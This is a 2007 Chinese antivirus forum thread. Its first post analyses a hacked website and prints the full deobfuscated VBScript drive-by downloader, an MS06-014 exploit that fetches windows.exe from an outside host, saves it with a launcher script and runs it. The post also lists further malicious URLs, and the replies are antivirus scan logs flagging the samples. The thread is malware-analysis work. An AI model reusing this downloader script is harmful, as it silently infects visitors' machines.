查看: 3670|回复: 10
收起左侧

毒网+毒

[复制链接]
dikex
发表于 2007-4-7 15:42:38 | 显示全部楼层 |阅读模式
看到http://bbs.kafan.cn/viewthread.php?tid=71193&extra=page%3D1里面的那个http://www.cckey.cn上面有两只马,于是想它的主页应该也有吧,也是就上去看看了,果然不出我所料

http://www.cckey.cn/index.htm上面有几个调用的,除了广告和丢失的就是http://www.cckey.cn/cc6/count.js了
里面调用http://www.hyap98.com/123/adnt.htm,unescape侍侯得:
  1. <SCRIPT>var Words="<script language="VBScript">
  2. On Error Resume Next
  3. QnxyX="http://www.hyap98.com/123/windows.exe"
  4. Set RJURL = document.createElement("object")
  5. ccc="clsid:BD96":lll="C556-65":sss="A3-11D":iii="0-983A-00C":ddd="04FC29E36":xxx="Microsoft.X":mmm="MLHTTp"
  6. RJURL.SetAttribute "classid", ccc&lll&sss&iii&ddd
  7. OOBnPl=xxx&mmm
  8. Set MKHbx = RJURL.CreateObject(OOBnPl,"")
  9. MKHbx.Open "GET", QnxyX, False
  10. MKHbx.Send
  11. MQWLa="~I7PRUGI1VAC.CoM"
  12. SEiDu="~V5SFDYCLNTK.VbS"
  13. XpTvd="~V5SFDYCLNTK.VbS"
  14. SS="Scripting."
  15. cc="FileSyst"
  16. rr="emObject"
  17. Set Kpzwb = RJURL.createobject(SS&cc&rr,"")
  18. Set SrHOx = Kpzwb.GetSpecialFolder(2)
  19. MQWLa=Kpzwb.BuildPath(SrHOx,MQWLa)
  20. SEiDu=Kpzwb.BuildPath(SrHOx,SEiDu)
  21. RR="Adod"
  22. NN="b.stream"
  23. UoNfL=RR&NN
  24. Set HSREb = RJURL.createobject(UoNfL,"")
  25. HSREb.type=1
  26. HSREb.Open
  27. HSREb.Write MKHbx.ResponseBody
  28. HSREb.Savetofile MQWLa,2
  29. HSREb.Close
  30. HSREb.Type=2
  31. HSREb.Open
  32. HSREb.WriteText  "Set Shell = CreateObject(""Wscript.Shell"")"&vbCrLf&"Shell.Run ("""&MQWLa&""")"&vbCrLf&"Set Shell = Nothing"
  33. HSREb.Savetofile SEiDu,2
  34. HSREb.Savetofile "c:\\NTDETECT.EXE",2
  35. HSREb.Close
  36. WSjog="Shell.Applica"
  37. Set Run = RJURL.createobject(WSjog&"tion","")
  38. Run.ShellExecute SEiDu,"","","Open",0
  39. </script></html><script type="text/jscript">function init() {document.writeln("<HEAD><TITLE>404 Not Found<\/TITLE><\/HEAD><BODY>");
  40. document.writeln("<H1>Not Found<\/H1>The requested URL \/codebase\/dff was not found on this server.<P>");
  41. document.writeln("<P>Additionally, a 404 Not Found");
  42. document.writeln("error was encountered while trying to use an ErrorDocument to handle the request.");
  43. document.writeln("<\/BODY>");}window.onload = init;
  44. </script>
复制代码



明显一个ms06-014网马,挂了http://www.hyap98.com/123/windows.exe
count.js里面还有一个指针漏洞的网马,http://www.hyap98.com/123/ad.png同样挂了windows.exe


之后http://www.cckey.cn/index.htm跳转到http://www.cckey.cn/index3.htm,里面的http://www.hyap98.com/123/yun.js 和上面count.js挂的是一样的,而http://www.chinaeve.com/game/ad.htm则无法下载。

另有广告页面几个,不贴了

样本几个

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
剑指七星
发表于 2007-4-7 15:43:35 | 显示全部楼层
已检测到: 恶意程序 Exploit.Win32.IMG-ANI.k        URL: http:/bbs.kafan.cn/attachment.php?aid=53153/ad.png
The EQs
发表于 2007-4-7 15:48:14 | 显示全部楼层

nod32貌似很少理财脚本和html。。。

Scan performed at: 2007-4-7 15:48:00
Scanning Log
NOD32 version 2172 (20070407) NT
Command line: C:\Documents and Settings\EQ2\桌面\a
Operating memory - is OK

Date: 7.4.2007  Time: 15:48:04
Anti-Stealth technology is enabled.
Scanned disks, folders and files: C:\Documents and Settings\EQ2\桌面\a\
C:\Documents and Settings\EQ2\桌面\a\ad.png - a variant of Win32/TrojanDownloader.Ani.Gen trojan
C:\Documents and Settings\EQ2\桌面\a\windows.exe - Win32/Pacex.Gen virus
Number of scanned files: 7
Number of threats found: 2
Number of files cleaned: 2
Time of completion: 15:48:04 Total scanning time: 0 sec (00:00:00)
mofunzone
发表于 2007-4-7 15:50:01 | 显示全部楼层
Starting the file scan:

Begin scan in 'C:\Documents and Settings\morgan\My Documents\a.rar'
C:\Documents and Settings\morgan\My Documents\
  a.rar
    [0] Archive type: RAR
    --> www.cckey.cn.htm
    --> windows.exe
        [DETECTION] Is the Trojan horse TR/Drop.Ag.344576.B
        [WARNING]   Infected files in archives cannot be repaired!
    --> ad.png
        [DETECTION] Contains signature of the exploits EXP/Ani.Gen
        [WARNING]   Infected files in archives cannot be repaired!
    --> adnt.htm
    --> count.js
    --> index3.htm
    --> yun.js
        [WARNING]   The file was ignored!
worker321
头像被屏蔽
发表于 2007-4-7 16:16:27 | 显示全部楼层
咖啡监控到一个


反病毒专家 AntiVirusKit 2006 扫描病毒日志记录
版本 16.0.7
双引擎反病毒签名 2007-4-5
开始时间: 2007-4-7 16:17
引擎: KAV 引擎 (AVK 16.10153), BD 引擎 (BD 16.6079)
高启发式: 打开
压缩文件: 打开
系统区域: 打开

扫描系统区域...
扫描所选择的目录和文件...
对象: ad.png
        在压缩档案里: C:\Documents and Settings\Administrator\桌面\a.rar
        Status: 已发现病毒
        病毒: Exploit.Win32.IMG-ANI.k (KAV 引擎), Exploit.Win32.MS05-002.Gen (BD 引擎)
对象: a.rar
        路径: C:\Documents and Settings\Administrator\桌面
        Status: 已发现病毒
        病毒: Exploit.Win32.IMG-ANI.k (KAV 引擎), Exploit.Win32.MS05-002.Gen (BD 引擎)
扫描完成: 2007-4-7 16:17
    已检查 1 个文件
    已发现 1 个染毒文件
    发现 0 个可疑文件

[ 本帖最后由 worker321 于 2007-4-7 16:17 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
fdqlovejm
发表于 2007-4-7 16:21:37 | 显示全部楼层
http://bbs.kafan.cn
支持一下
solcroft
发表于 2007-4-7 16:21:51 | 显示全部楼层

avast!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
soul20010
发表于 2007-4-7 16:30:04 | 显示全部楼层
BitDefender Antivirus Plus v10
a.rar=>windows.exe        Suspect: GenPack:Generic.Malware.WB.E3E9180D
a.rar=>ad.png        Infected: Exploit.Win32.MS05-002.Gen
金剑
头像被屏蔽
发表于 2007-4-7 16:38:50 | 显示全部楼层
风暴胜者V2 测试版本(http://www.v0day.com)
_________您的安全是我们的责任_______________
载入病毒库…进行整理…分配内存…可以使用



===============================================
   ___________病毒查杀结果__________________


===============================================

2002年4月7日16时38分20秒 开始查杀C:\Documents and Settings\Administrator\桌面\新建文件夹\a
C:\Documents and Settings\Administrator\桌面\新建文件夹\a\windows.exe 发现未知可疑文件:Win32.Nop 4fi6 操作:阻止运行
=========================================

_________文件性质分析结果________________
"带壳"仅指文件性质,仅供专业人员分析使用。


C:\Documents and Settings\Administrator\桌面\新建文件夹\a\windows.exe 带壳文件:UPX加壳
-----------------------------------------

2002年4月7日16时38分20秒收起线程…100% 查杀完毕!
扫描文件:2查杀病毒:1
harry_chang2003
头像被屏蔽
发表于 2007-4-7 19:17:00 | 显示全部楼层
PCC掃到一隻
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-11 11:11 , Processed in 0.120468 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表